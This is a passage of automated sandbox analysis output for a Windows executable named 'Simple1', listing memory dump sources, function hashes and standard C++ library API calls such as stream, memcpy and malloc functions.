            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
            • String ID:
            • API String ID: 356833432-0
            • Opcode ID: 6ce735ca48fa2ee1b099f78e9ccbb34916796cd0af07463176dd75adeae5a579
            • Instruction ID: 0f210a8ad2cfe57f69d187fe7b4826b93c2b31b291a2dbc75ffdf8f07c778d19
            • Opcode Fuzzy Hash: 6ce735ca48fa2ee1b099f78e9ccbb34916796cd0af07463176dd75adeae5a579
            • Instruction Fuzzy Hash: 0A21E632A09F4184DB459F3AE45436877A4F748F58F85403ADA4D873A4DF38E499C760
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
            • Instruction ID: b8f0a4d72c7067be9db7eda11bc4477464a5d51d5cdf6cada44ca7a7162090cd
            • Opcode Fuzzy Hash: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
            • Instruction Fuzzy Hash: 45018C76B18F5482DA04AF1AE24006EA775FB88FC8B948536DF5C07B59DF38E5A28340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
            • String ID:
            • API String ID: 313767242-0
            • Opcode ID: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
            • Instruction ID: 9cb3e9a5abc0d325b38117bab4bd86cabf62a197b27f49dcf6d47d70ddb7d553
            • Opcode Fuzzy Hash: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
            • Instruction Fuzzy Hash: AF311E72605F8186EB649F61E8403EDB3A4FB84754F84443EDA4E47B95DF38E548C724
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
            • String ID:
            • API String ID: 2933794660-0
            • Opcode ID: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
            • Instruction ID: bcdb5b7cd1fcfe416b6b5943453cbe6f08d9d6827129c8497391d3b3c66cbf2a
            • Opcode Fuzzy Hash: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
            • Instruction Fuzzy Hash: 73117336B14F0189EB00DF61E8552B973A4F758768F841D35EA6D867A4DF3CE19883A0
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
            • Instruction ID: 56313b015c6b67dcc105e90fcaf3a1ba4babd957f76379f31d702a52e59f4276
            • Opcode Fuzzy Hash: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
            • Instruction Fuzzy Hash: 75A0022190CC06D0E648BB02E950131A370FB50760BC0447DF00E411B49F3CB428C338
            APIs
            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39157F
            • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF71E39159E
            • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E3915D2
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF71E391609
            • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF71E391648
            • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF71E39166D
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF71E39169B
            • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E391782
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E39178C
              • Part of subcall function 00007FF71E399820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39986D
              • Part of subcall function 00007FF71E399820: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E39988D
              • Part of subcall function 00007FF71E399820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39989D
              • Part of subcall function 00007FF71E399820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E3998FD
              • Part of subcall function 00007FF71E399820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E399926
              • Part of subcall function 00007FF71E399820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E39995D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
            • String ID: _$~
            • API String ID: 2365617078-3740536066
            • Opcode ID: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
            • Instruction ID: d0fa9b26b34ef3add3d41e3e0d5303c01b66ac5f735f027da970c1213b1faaa4
            • Opcode Fuzzy Hash: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
            • Instruction Fuzzy Hash: 80718032A18E8186EB10EF55E4502BEB7A0FB84BA8F85453ADE4D53768DF7CE449C710
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$memcpy$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
            • String ID:
            • API String ID: 4130688501-0
            • Opcode ID: cfd1beb5ca8a44b69c7c7c5046c50dfb179123356a759ba1980d50ea050ef1cc
            • Instruction ID: ca6f8453a07024555c5ba925afb1f0cd7a981d22718f2c2079cf1282094cf5ae
            • Opcode Fuzzy Hash: cfd1beb5ca8a44b69c7c7c5046c50dfb179123356a759ba1980d50ea050ef1cc
            • Instruction Fuzzy Hash: D8D1A122F19F4295FB10EB64E4403BDA2A1AB84BA4F844239DE6D13BD5DF3CF4898310
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39986D
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E39988D
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39989D
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E3998FD
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E399926
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E39995D
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF71E3999A1
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF71E3999A8
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF71E3999B5
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 569342377-0
            • Opcode ID: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
            • Instruction ID: bf438ff8029a0d06f694c04a57b6a2b044b23c441d121c4a1d1aff1626af5de2
            • Opcode Fuzzy Hash: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
            • Instruction Fuzzy Hash: D8516232609E82C6EB109F1AD5D023CA7A0FF84FA5B55853ADE5E477A0CF39E45AC310
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39B2B5
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E39B2D5
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E39B2E5
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E39B32C
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF71E39B359
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF71E39B37A
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF71E39B3C0
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF71E39B3C7
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF71E39B3D4
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 1135186806-0
            • Opcode ID: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
            • Instruction ID: 3b0eb7bb6b3a869176deec747ca0287b4c31d6f791fc30e69649e3c421e849f3
            • Opcode Fuzzy Hash: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
            • Instruction Fuzzy Hash: 63510F32608E4181EB64EF1AD5D023DE7A0EB85FA5F95853ADE8F43760CF39E44A8314
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@memcpy
            • String ID:
            • API String ID: 281699261-0
            • Opcode ID: 3309dcd0081c79f594bfde7a105637bedcb09065e6d06f78406e03dfd8012cc7
            • Instruction ID: 54719967397778c08f18396f73d42bde6f79505329d3ae536702cd17f60b4825
            • Opcode Fuzzy Hash: 3309dcd0081c79f594bfde7a105637bedcb09065e6d06f78406e03dfd8012cc7
            • Instruction Fuzzy Hash: 9CB18362F18E4699FB00EB69D4842BDB371EB487A8F844639DA5D13BD8DF38E148C350
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: fgetc
            • String ID:
            • API String ID: 2807381905-0
            • Opcode ID: 94e8ab0efe7d4b137a3b05c93b30f3fe4500affb8bd3879b5ab15718a847d132
            • Instruction ID: f2b0beecd3622907dc0310c151331a2aeb6d63e6aba39d8ddb23d7fc15cde8bd
            • Opcode Fuzzy Hash: 94e8ab0efe7d4b137a3b05c93b30f3fe4500affb8bd3879b5ab15718a847d132
            • Instruction Fuzzy Hash: 4781AC32B14E4199EB109F65D4803AC77B4FB48B68F84163ADE5E53B94DF38E499C320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
            • Instruction ID: 5ee538150ef3474ec6b10ddbf307e297fa9b9a376d13c76e2a7e97e9bdb3f72e
            • Opcode Fuzzy Hash: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
            • Instruction Fuzzy Hash: 9451C062A08F8181EA14AF21D5042A9A3A0FB14BA8F94463ADF6D17792DF38F599D350
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
            • Instruction ID: 04817e69839ade4c57ba11c01a7abe2ee86112715fa8257a71efbf6185329f72
            • Opcode Fuzzy Hash: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
            • Instruction Fuzzy Hash: BA519E22E08F8591EA14BF25D40426CA3A0FB55BA8F944B3ADE2D133C5DF38F59AC350
            APIs
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF71E398E38), ref: 00007FF71E398580
              • Part of subcall function 00007FF71E39B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
              • Part of subcall function 00007FF71E391310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF71E39131B
            • memcpy.VCRUNTIME140(?,?,?,00007FF71E398E38), ref: 00007FF71E3985A1
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E3985BC
              • Part of subcall function 00007FF71E391270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF71E39B543), ref: 00007FF71E3912B4
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF71E398E38), ref: 00007FF71E398625
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF71E398E38), ref: 00007FF71E39862E
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemcpy
            • String ID:
            • API String ID: 2733788171-0
            • Opcode ID: e28755828890e6c912199f3192cdbd6f9bad720a5d8a0c03b427355e0768411d
            • Instruction ID: fe4b7ceff90428e5e760131081820c04c1356401f23c73b5abdb6e437b24637a
            • Opcode Fuzzy Hash: e28755828890e6c912199f3192cdbd6f9bad720a5d8a0c03b427355e0768411d
            • Instruction Fuzzy Hash: F741E632B05F4681EB54AB25E4403B8A3A0EB44BB4F948639DB6D037D6DF38E8D9C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task
            • String ID:
            • API String ID: 118556049-3916222277
            • Opcode ID: a1ece21511878a53d831423d5df3da6f5655f9674703bd69ed9d5c1f4223082c
            • Instruction ID: 3fdd2965847f1283a963a29b21f1be94a0994a7979a494b529e0babf5e311a1d
            • Opcode Fuzzy Hash: a1ece21511878a53d831423d5df3da6f5655f9674703bd69ed9d5c1f4223082c
            • Instruction Fuzzy Hash: 9F515D72608F4596EB169F2AD45426C73A0FB48BA4F94453ADF5E47BE4CF38E0A5C310
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: __current_exception__current_exception_contextterminate
            • String ID: csm
            • API String ID: 2542180945-1018135373
            • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
            • Instruction ID: 3ed8f9903066ef9f52332a1af90e466f8319d0b0e0d759da32756cef6fb63506
            • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
            • Instruction Fuzzy Hash: AFF01737605F44CAD719AF21E8811AC7364FB8CBA8B8A5134FA4E47B55CF38E894C350
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: fb9d2bdb648af42fefb7d3d35d54711275bd13974947691adb6822c34bd07723
            • Instruction ID: 6f485f1b893f81ec382453932d205a6fc3886700c76b130977b22272e265c44d
            • Opcode Fuzzy Hash: fb9d2bdb648af42fefb7d3d35d54711275bd13974947691adb6822c34bd07723
            • Instruction Fuzzy Hash: 2B31BF62B09E4688FE15BF56A5003B992A19B04FF4F984639CA2D07BD5DF3DF489C320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task
            • String ID:
            • API String ID: 118556049-0
            • Opcode ID: 3d20d57a787e7cc7e4267bc87cdaf85bd6203bd7aad9f80573a740d7d8076353
            • Instruction ID: 77284a0eff426f9bd6d2d1f5d73687515b74b3083fc40670cf98a47b7d88d117
            • Opcode Fuzzy Hash: 3d20d57a787e7cc7e4267bc87cdaf85bd6203bd7aad9f80573a740d7d8076353
            • Instruction Fuzzy Hash: DE21D811B18A9A59ED183A7B49054A696616F25FF0E794B38EE3C17BD2DF2CF4078220
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
